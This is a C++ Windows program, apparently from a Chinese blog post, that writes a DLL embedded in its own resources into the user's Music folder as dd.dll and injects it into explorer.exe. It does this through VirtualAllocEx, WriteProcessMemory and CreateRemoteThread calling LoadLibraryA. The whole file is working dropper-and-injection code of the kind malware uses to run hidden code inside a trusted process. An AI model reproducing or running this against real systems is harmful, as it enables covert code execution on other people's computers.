#include<Windows.h>
#include<atlstr.h>
#include<TlHelp32.h>
#include<Psapi.h>
#include <Shlobj.h>
#include<mciapi.h>
#include"resource.h"
#pragma comment (lib, "winmm.lib")
#pragma warning(disable:4996)
#pragma comment (lib,"Psapi.lib")
#include"vol.h"
class InputStream
{
public:
void*filestream;
int len;
int pos;
int read(byte *bt, int len_t)
{
if (this->pos >= this->len)
return -1;
for (int i = 0; i < len_t; i++)bt[i] = 0;
int l = 0;
int start = this->pos;
for (int i = start; i < start + len_t; i++, l++)
{
this->pos = i;
if (i >= len)
break;
bt[l] = ((byte*)(this->filestream))[i];
}
this->pos = this->pos + 1;
return l;
}
~InputStream()
{
UnlockResource(this->filestream);
}
void debug()
{
//printf("debug %d\n", this->len);
}
};
InputStream * getResourceAsStream(int ID, HMODULE hModule)
{
HRSRC hResource = FindResource(hModule, MAKEINTRESOURCE(ID), "DATA");
//printf("%s\n", hResource != NULL?"正确":"错误");
HGLOBAL hLoadedResource = LoadResource(hModule, hResource);
LPVOID pResourceData = LockResource(hLoadedResource);
DWORD dwResourceSize = SizeofResource(hModule, hResource);
InputStream*is = new InputStream;
is->filestream = pResourceData;
is->len = dwResourceSize;
is->pos = 0;
return is;
}
DWORD findPid()
{
HANDLE help = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);
BOOL ret = Process32First(help, &pe32);
while (ret)
{
ret = Process32Next(help, &pe32);
if (!ret)
break;
if (!strcmp(pe32.szExeFile, "explorer.exe"))
{
return pe32.th32ProcessID;
}
HANDLE process_handle = OpenProcess(PROCESS_ALL_ACCESS/*所有权限*/, FALSE, pe32.th32ProcessID);
char path[MAX_PATH + 1];
GetModuleFileNameEx(process_handle, NULL, path, MAX_PATH + 1);
}
return 0;
}
int WINAPI WinMain(HINSTANCE h1, HINSTANCE h2, LPSTR cmd, int show)
{
char path[255];
SHGetSpecialFolderPath(
NULL, // 保留
path, // 接受文件路径的字符串指针
CSIDL_MYMUSIC, // CSIDL 宏
FALSE // 如果文件夹不存在,则不创建文件夹
);
strcat(path, "\\dd.dll");
HMODULE md = GetModuleHandle(NULL);
InputStream *file = getResourceAsStream(IDR_DATA1, md);
FILE *fp = fopen(path, "wb");
unsigned char reader[1024];
int len = 0;
while ((len = file->read(reader, 1024)) != -1)
{
fwrite(reader, 1, len, fp);
}
delete file;
fclose(fp);
CString h=path;
char error[200];
DWORD PID = findPid();
if (PID == 0)
{
return 0;
}
HANDLE openp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
LPVOID addr = VirtualAllocEx(openp, NULL/*自动分配*/, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);//申请内存
if (addr == NULL)
{
sprintf(error, "申请内存失败!\n错误码:%d", GetLastError());
MessageBox(0,error, "错误", 16);
return 0;
}
if (WriteProcessMemory(openp, addr, h.GetBuffer(), h.GetLength() + 1, NULL) == FALSE)
{
sprintf(error, "写入失败!\n错误码:%d", GetLastError());
MessageBox(0,error, "错误", 16);
return 0;
}
LPTHREAD_START_ROUTINE startaddr = (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibrary("Kernel32.dll"), "LoadLibraryA");
if (startaddr == NULL)
{
sprintf(error, "起始点定位失败!\n错误码:%d", GetLastError());
MessageBox(0,error, "错误", 16);
return 0;
}
HANDLE ok = CreateRemoteThread(openp, NULL, 0, startaddr, addr, 0, NULL);
if (ok == NULL)
{
sprintf(error, "创建远程线程失败!\n错误码:%d", GetLastError());
MessageBox(0,error, "错误", 16);
return 0;
}
MessageBox(0,"成功", "", 0);
return 0;
}
C++将DLL插入到explorer.exe并运行
最新推荐文章于 2024-04-13 17:06:59 发布